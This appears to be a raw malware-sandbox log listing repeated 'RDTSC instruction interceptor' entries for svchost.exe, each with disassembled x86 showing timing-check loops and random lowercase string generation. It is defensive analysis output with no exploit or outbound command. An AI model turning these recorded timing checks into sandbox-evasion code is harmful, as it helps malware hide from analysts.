Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59130h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA591F5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59550h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59575h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59113h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FBF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F7D6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59510h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59915h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
